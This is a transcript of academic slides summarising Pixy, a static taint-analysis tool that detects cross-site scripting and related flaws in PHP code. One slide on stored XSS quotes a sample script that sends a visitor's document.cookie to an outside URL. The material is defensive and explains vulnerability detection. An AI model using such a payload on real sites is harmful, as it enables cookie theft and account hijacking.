Presentation is loading. Please wait.

Presentation is loading. Please wait.

Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities Nenad Jovanovic, Christopher Kruegel, Engin Kirda Secure Systems Lab Vienna.

Similar presentations


Presentation on theme: "Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities Nenad Jovanovic, Christopher Kruegel, Engin Kirda Secure Systems Lab Vienna."— Presentation transcript:

1 Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities Nenad Jovanovic, Christopher Kruegel, Engin Kirda Secure Systems Lab Vienna University of Technology Proceedings of the IEEE Symposium on Security and Privacy. (May 2006)

2 2008/10/22 Outline Introduction Taint-Style Vulnerabilities Data Flow Analysis Empirical Results Conclusions Comments

3 2008/10/23 Introduction(1/2) There are urgent need for automated vulnerability detection in Web apps development. The existing approaches for mitigating threats to Web apps can be divided into  client-side and server-side solutions Server-side solutions:  Static approaches Scan source code for vulnerabilities  Dynamic approaches Detect while executing the audited program

4 2008/10/24 Introduction(2/2) Pixy  The first open source tool for statically detecting XSS vulnerabilities in PHP4 code by means of data flow analysis  It can be applied to other taint-style vulnerabilities such as SQL injection or command injection  http://pixybox.seclab.tuwien.ac.at/pixy/index.php http://pixybox.seclab.tuwien.ac.at/pixy/index.php

5 2008/10/25 Taint-Style Vulnerabilities(1/2) Of all vulnerabilities in Web apps, problem caused by unchecked input are recognized as being the most common  Inject malicious data in Web applications  Manipulate applications using malicious data The authors refer to this class of vulnerabilities as the tainted object propagation problem Referenced from “Finding security errors in Java programs with static analysis,. in Proceedings of the 14th UsenixSecurity Symposium, Aug. 2005”

6 2008/10/26 Taint-Style Vulnerabilities(2/2) Tainted data  Originate from potentially malicious users  Cause security problems at vulnerable points in the program (called sensitive sinks)  May enter the program at specific places, and can spread via assignment and similar constructs  Can be untainted (sanitized) using a set of operations Many important types of vulnerabilities (e.g., XSS or SQL injection) can be seen as instances of this general class of taint-style vulnerabilities.  Differ only with respect to concrete values of few parameters

7 2008/10/27 Cross-Site Scripting (XSS)(1/2) Occurs when dynamically generated Web pages display improperly validated input An attacker may embed malicious JavaScript code into dynamically generated pages of trusted sites.  hijack the user account credentials  change user settings  steal cookies  insert unwanted content into the page

8 2008/10/28 Cross-Site Scripting (XSS)(2/2) Reflected Cross-Site Scripting Attacks Stored Cross-Site Scripting Attacks  An attacker's malicious script is rendered more than once alert('Hello World'); 一個關於兔子的網頁 location.replace('http://rickspage.com/?secret='+document.cooki e)

9 2008/10/29 Properties of XSS Entry Points into the programs  GET: $_GET  POST: $_POST  COOKIE: $_COOKIE  entry points grows when the “register globals” is active Sanitation Routines  htmlentities(), htmlspecialchars(), and type casts Sensitive Sinks  echo()  print()  printf()…

10 2008/10/210 Data Flow Analysis(1/4) Goal: To determine whether it is possible that tainted data reaches sensitive sinks without being properly sanitized.  Identify the taint value of variables used in these sinks Statistically compute certain information for every single program point (or for coarser units such as functions) PHP Front-End  construct a parse tree for PHP input file  transformed into linearized form resembling three-address code (TAC), and kept as a control flow graph for each encounter function Assembly-like language At most 3 operands “x = y op z”

11 2008/10/211 Data Flow Analysis(2/4) Operates on the control flow graph (CFG) of a program  A data structure built on top of the intermediate code representation abstracting the control flow behavior of a function that is being compiled  Node – atomic statement of program  Edge – flow of control

12 2008/10/212 Literal Analysis: Basics Purpose: To determine, for each program point, the literal that a variable or a constant can hold. Can improve the precision of the overall analysis by:  Evaluate branch conditions  Ignore program paths that cannot be executed at runtime (called path pruning)  Resolution of non-literal include statements, variable variables, variable array indices, and variable function calls (only for potential uses) After performing literal analysis  each CFG node is associated with information about which literal is mapped to a variable before executing that node

13 2008/10/213 How Data Flow Analysis is Used to Perform Literal Analysis Assume a fictitious programming language  One variable (v)  Two literals (the integer 3 and 4) “skip” node  empty instruction “Ω”  Unknown literal

14 2008/10/214 Data Flow Analysis(3/4) Carrier Lattice  Information about program represented using values from algebraic structure  Every information that could ever be associated with a CFG node by the analysis must be contained as an element of the used lattice  Bottom element : “ not visited yet ” at the biginning  Line: ordering between elements regard to precision  Least upper bound : the smallest element that is greater than or equal to both of the elements. Needed by the analysis algorithm

15 2008/10/215 Data Flow Analysis(4/4) Transfer Function  f: P  P for each node in control flow graph Input: a lattice element Output: a lattice element  Models effect of the node on the program information  Each CFG node is associated with such a transfer function

16 2008/10/216 Literal Analysis: Basics Carrier Lattice Definition  Provides mappings for all variables and constants that appear in the scanned program  Able to describe the mapping to any possible literal (infinite)

17 2008/10/217 Literal Analysis: Basics Transfer Function Definition  PHP without explicit type declarations  “Hidden” array

18 2008/10/218 Four cases in order of increasing complexity 1. Not an array element and not known as array  strong update 2. An array, but not an array element  Array tree 3. Element without non-literal indices (may be an array)  strong overlap

19 2008/10/219 Four cases in order of increasing complexity 4. An array element with non-literal indices and maybe an array  weak overlap algorithm: all overwrite operations are replaced by least upper bound operations Array elements with one or more non-literal indices are permanently mapped to Ω

20 2008/10/220 Alias Analysis Ignoring the information of alias relationships would prevent literal analysis from producing correct results in a number of cases. Without alias analysis, literal analysis can’t decide that $a also affects $b $b remain unchanged and be incorrect!

21 2008/10/221 Carrier Lattice Definition Alias group: a group of variables referencing the same memory location Modeling alias information through sets of alias group sets  (…): an alias group  {…}: an alias group set Must-aliases of a variable  “{(a,b) (c)}”  $b: must-alias of $a May-aliases of a variable  “{(a,b) (c)} {(a,c) (b)}”  $b and $c: may-aliases of $a The order among lattice elements is defined as subset inclusion

22 2008/10/222 Static analysis is not able to decide which path the program will take  Under the assumption that the condition is determined by dynamic factors  Environment variables, user input

23 2008/10/223 Transfer Function Definition Reference assignment  “$a = & $b” Unset node  Own one-element alias group for each alias group set Global node  Equally-name variable from the global scope on the right side  “global $a;” The authors only consider references to simple variables

24 2008/10/224 Literal Analysis Revisited Here we only consider references to simple variables Functions built into PHP are conservatively modeled as returning Ω since the increased precision is expected to be rather small  only built-in function modeled precisely is “define”

25 2008/10/225 Literal Analysis Revisited The transfer function at the call preparation node stores the alias information for the local variables of the calling function, and resets it to its default (initial) value On function return (i.e., at the call return node), the alias information for local variables of the callee is reset to its default, while the caller's locals are restored again.

26 2008/10/226 Taint Analysis Purpose: To determine, for each program point, the taint value (instead of the literal) of a variable or constant. Possible to inspect whether any sensitive sink in the program is receiving malicious data, and hence, to detect vulnerabilities

27 2008/10/227 Taint Analysis Carrier Lattice Definition  Tainted: if it can hold a malicious, not yet sanitized (checked) value originating from user input  Not map to Ω but to the tainted values tainted and untainted mapped to tainted: this variable might be tainted. mapping to untainted: this variable is untainted. whenever the analysis cannot determine, it is conservatively assumed to be tainted

28 2008/10/228 Taint Analysis Transfer Functions Definition  Implicitly casting a tainted variable into an integer untaints this variable (with unary operators such as +, -, and (int))  Correctly model built-in PHP functions can reduce the number of false positives Pixy processes a specification file on startup which contains abstracted versions of some built-in functions in PHP syntax “htmlentities” and “array” return $_UNTAINTED

29 2008/10/229 Taint Analysis Using the Analysis Results  Generating warnings that point the developer to possible XSS vulnerabilities at the end of the analysis is straightforward. The analysis information for each sensitive sink is searched for tainted input variables a A warning message indicating the corresponding line is issued if such a violation is discovered

30 2008/10/230 Limitations Pixy does not support object-oriented features of PHP.  Malicious data can never arise from such constructs. Files included with “include” and similar keywords are not scanned automatically  The authors frequently observed false positives stemming from these lacking file inclusions  Eliminated through manual inclusion

31 2008/10/231 Empirical Results

32 2008/10/232 Empirical Results

33 2008/10/233

34 2008/10/234 Conclusions A flow-sensitive, interprocedural, and context- sensitive data flow analysis for PHP, targeted at detecting taint-style vulnerabilities Additional literal analysis and alias analysis to improve correctness and precision of taint analysis Pixy, an open-source Java tool that implements these analysis technique Experimental validation of Pixy’s ability to detect unknown vulnerabilities with a low false positive rate

35 2008/10/235 Comments The first to perform alias analysis for an untyped, reference-based scripting language such as PHP Beyond the scope of the paper  Recursive calls depends on dynamic information  Infinite call depth for non-terminating programs The implementation is widely used by the public. Future work  automatic inclusion of “include” files


Download ppt "Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities Nenad Jovanovic, Christopher Kruegel, Engin Kirda Secure Systems Lab Vienna."

Similar presentations


Ads by Google